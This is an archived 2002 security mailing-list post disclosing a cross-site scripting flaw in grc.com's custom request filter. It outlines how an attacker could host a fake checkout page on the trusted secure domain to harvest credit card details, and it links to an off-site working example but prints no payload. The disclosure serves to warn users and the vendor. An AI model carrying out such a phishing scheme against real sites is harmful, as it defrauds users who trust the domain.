This was discovered last February and listed at: http://pointblanksecurity.com/css/ > Wednesday, May 01, 2002 > > The following represents a classic [fitting] working example of the > dangers of Cross Site Scripting. > > [see: http://www.cert.org/advisories/CA-2000-02.html > http://www.cert.org/archive/pdf/cross_site_scripting.pdf] > > Gibson Research Corporation http://www.grc.com is an interesting site > covering a wide variety of security topics for newcomers. Cursory > research suggests that it enjoys a substantial loyal following who > trust it implicitly. > > The problem is two-fold: > > 1. The site has a web based discussion forum > 2. The site has a custom 'filter', the so-called: "Gibson Research > Corporation's IIS Advanced Prophylactic Filter" > > This custom 'filter' is supposed to protect the server > from 'malicious abuse' and both 'detect and block' invalid requests > submitted to the server: > > http://www.grc.com/apf/ > > [screen shot: http://www.malware.com/flitty.png 25KB] > > Unfortunately, what it actually does is allow us to inject our own > html code through grc.com's secured server. This is particularly > ticklish as it does not take much to conjure up a scenario where we > construct a 'fake' e-commerce page, say peddling a book or 'gadget' > download and simply invite the loyal following to go and submit their > credit card details to our custom form. > > The site grc.com well known and trusted. The page is on a secured > server with valid certificates. > > Ripe For Picking™ > > Crude Working example: > > note: custom crafted for Internet Explorer 5.5 and 6 > > http://www.malware.com/grc.html > > [screen shot: http://www.malware.com/lucre.png 11KB] > > Notes: > > 1. Watch where you "point and click". It's all smoke and mirrors out > there. > 2. 3 mail messages within 72 hours to support @ grc.com remain > unanswered to date. > > > End Call > > -- > http://www.malware.com > > > > > > > > > >
This archive was generated by hypermail 2b30 : Thu May 02 2002 - 13:35:35 PDT